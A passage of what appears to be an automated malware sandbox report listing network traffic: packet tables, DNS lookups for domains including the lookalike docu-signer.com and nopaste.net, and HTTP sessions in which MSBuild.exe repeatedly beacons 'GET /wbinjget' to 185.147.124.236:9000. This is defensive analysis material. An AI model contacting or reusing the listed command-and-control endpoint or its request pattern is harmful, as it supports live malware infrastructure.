Dec 17, 2024 08:12:04.399337053 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.503623009 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.503746986 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.519078016 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.519171000 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.623430967 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.623563051 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.638979912 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.639023066 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.743382931 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.743462086 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.758769989 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.759332895 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.863261938 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.863339901 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.879085064 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.879139900 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.983215094 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:04.983309984 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:04.998934984 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.081139088 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.081288099 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.103162050 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.103218079 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.201112986 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.204792023 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.223015070 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.295299053 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.296799898 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.324569941 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.359786987 CET	9000	50067	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.359895945 CET	9000	50067	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.359961033 CET	50067	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.366858006 CET	50067	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.393362999 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.396167040 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.416609049 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.486591101 CET	9000	50067	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.491852999 CET	50069	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.515913963 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.515968084 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.516683102 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.516762018 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.609754086 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.609828949 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.611622095 CET	9000	50069	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.611784935 CET	50069	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.613939047 CET	50069	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.676868916 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.676944971 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.708187103 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.708554983 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.729690075 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.729751110 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.733638048 CET	9000	50069	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.798829079 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.798980951 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.800750971 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.849508047 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.849771023 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:05.921911001 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:05.922086954 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.020775080 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.020852089 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.093019962 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.093101978 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.140716076 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.142791986 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.156981945 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.157099009 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.234755993 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.234880924 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.276936054 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.277043104 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.396965981 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.397049904 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.397089958 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.469062090 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.469149113 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.560937881 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.561036110 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.588975906 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.589035034 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.589174986 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.708842039 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.708954096 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.708986998 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.709095001 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.873121977 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.873269081 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.915040016 CET	9000	50069	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.915090084 CET	9000	50069	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.915332079 CET	50069	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.915332079 CET	50069	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:06.945014954 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:06.945102930 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.031352997 CET	50074	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.036118031 CET	9000	50069	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.045732021 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.045941114 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.066946030 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.066962957 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.067090034 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.151235104 CET	9000	50074	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.151602030 CET	50074	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.151602030 CET	50074	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.185565948 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.186992884 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.228887081 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.229084969 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.271358013 CET	9000	50074	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.305154085 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.305349112 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.306740999 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.348949909 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.349659920 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.425100088 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.425209045 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.469491005 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.469626904 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.499046087 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.499303102 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.541131020 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.541941881 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.589370012 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.589703083 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.661757946 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.661848068 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.709424973 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.709558010 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.782352924 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.782454967 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.830759048 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.831356049 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.903435946 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.903515100 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:07.951091051 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:07.951339960 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.030308008 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.030458927 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.143589973 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.143682003 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.263382912 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.263442993 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.264287949 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.343167067 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.343241930 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.454619884 CET	9000	50074	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.454804897 CET	9000	50074	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.454854012 CET	50074	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.454854012 CET	50074	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.455533981 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.455610037 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.563538074 CET	50080	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.574740887 CET	9000	50074	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.575381994 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.575454950 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.575530052 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.683442116 CET	9000	50080	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.683592081 CET	50080	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.683720112 CET	50080	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.767658949 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.768052101 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:08.803500891 CET	9000	50080	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.888246059 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:08.890912056 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.010791063 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.011028051 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.070290089 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.070308924 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.071082115 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.191912889 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.192075014 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.203258991 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.204011917 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.323668003 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.324454069 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.445038080 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.445122957 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.504353046 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.504942894 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.624927998 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.628853083 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.636634111 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.719353914 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.743379116 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.743477106 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.817065001 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.817393064 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.933181047 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.933274031 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.995240927 CET	9000	50080	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.995301008 CET	9000	50080	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:09.995384932 CET	50080	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:09.995415926 CET	50080	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.053030014 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.053076029 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.053080082 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.053152084 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.109611034 CET	50083	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.115490913 CET	9000	50080	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.129328012 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.129385948 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.229365110 CET	9000	50083	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.229624033 CET	50083	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.245287895 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.365084887 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.365195036 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.601095915 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.717864037 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:10.799925089 CET	15647	50063	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:10.905349016 CET	50063	15647	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:16.861903906 CET	50083	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:16.981815100 CET	9000	50083	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:17.310668945 CET	9000	50083	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:17.310725927 CET	9000	50083	185.147.124.236	192.168.2.7
Dec 17, 2024 08:12:17.310870886 CET	50083	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:17.311007023 CET	50083	9000	192.168.2.7	185.147.124.236
Dec 17, 2024 08:12:17.431602955 CET	9000	50083	185.147.124.236	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:10:06.266836882 CET	59511	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:06.532349110 CET	50095	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:06.536077023 CET	53	59511	1.1.1.1	192.168.2.7
Dec 17, 2024 08:10:11.418844938 CET	62001	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:13.728816986 CET	59225	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:14.076849937 CET	53	59225	1.1.1.1	192.168.2.7
Dec 17, 2024 08:10:21.448244095 CET	58330	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:21.585558891 CET	53	58330	1.1.1.1	192.168.2.7
Dec 17, 2024 08:10:27.452478886 CET	63288	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:10:27.591548920 CET	53	63288	1.1.1.1	192.168.2.7
Dec 17, 2024 08:10:32.508155107 CET	57626	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:11:56.436757088 CET	52510	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:11:56.577148914 CET	53	52510	1.1.1.1	192.168.2.7
Dec 17, 2024 08:12:11.219120979 CET	54558	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:12:11.356353045 CET	53	54558	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 08:10:06.266836882 CET	192.168.2.7	1.1.1.1	0xc783	Standard query (0)	docu-signer.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:06.532349110 CET	192.168.2.7	1.1.1.1	0x9ad8	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:11.418844938 CET	192.168.2.7	1.1.1.1	0x27a4	Standard query (0)	www.irs.gov	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:13.728816986 CET	192.168.2.7	1.1.1.1	0x606e	Standard query (0)	nopaste.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:21.448244095 CET	192.168.2.7	1.1.1.1	0xc3e9	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:27.452478886 CET	192.168.2.7	1.1.1.1	0xed96	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:32.508155107 CET	192.168.2.7	1.1.1.1	0xc74d	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:11:56.436757088 CET	192.168.2.7	1.1.1.1	0x2a36	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:12:11.219120979 CET	192.168.2.7	1.1.1.1	0xd112	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 08:10:06.536077023 CET	1.1.1.1	192.168.2.7	0xc783	No error (0)	docu-signer.com		104.21.87.65	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:06.536077023 CET	1.1.1.1	192.168.2.7	0xc783	No error (0)	docu-signer.com		172.67.142.2	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:06.672097921 CET	1.1.1.1	192.168.2.7	0x9ad8	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:10:09.596718073 CET	1.1.1.1	192.168.2.7	0x9923	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:10:09.596718073 CET	1.1.1.1	192.168.2.7	0x9923	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:11.827066898 CET	1.1.1.1	192.168.2.7	0x27a4	No error (0)	www.irs.gov	www.irs.gov.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:10:14.076849937 CET	1.1.1.1	192.168.2.7	0x606e	No error (0)	nopaste.net		174.138.125.138	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:21.585558891 CET	1.1.1.1	192.168.2.7	0xc3e9	No error (0)	google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:27.591548920 CET	1.1.1.1	192.168.2.7	0xed96	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:32.824533939 CET	1.1.1.1	192.168.2.7	0xc74d	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:10:34.851737022 CET	1.1.1.1	192.168.2.7	0x9810	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:34.851737022 CET	1.1.1.1	192.168.2.7	0x9810	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:48.373342991 CET	1.1.1.1	192.168.2.7	0xf50e	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:48.373342991 CET	1.1.1.1	192.168.2.7	0xf50e	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:10:59.997908115 CET	1.1.1.1	192.168.2.7	0xf48b	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:10:59.997908115 CET	1.1.1.1	192.168.2.7	0xf48b	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:11:23.203600883 CET	1.1.1.1	192.168.2.7	0x29f8	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:11:23.203600883 CET	1.1.1.1	192.168.2.7	0x29f8	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:11:47.294307947 CET	1.1.1.1	192.168.2.7	0xec32	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:11:47.294307947 CET	1.1.1.1	192.168.2.7	0xec32	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:11:56.577148914 CET	1.1.1.1	192.168.2.7	0x2a36	No error (0)	google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:12:11.356353045 CET	1.1.1.1	192.168.2.7	0xd112	No error (0)	google.com		172.217.17.46	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docu-signer.com

nopaste.net

google.com

www.google.com

185.147.124.236:9000

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49821	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:49.415740013 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:10:50.727508068 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49828	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:51.033657074 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:10:52.343156099 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:52 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49830	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:52.575151920 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:10:53.885638952 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:53 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
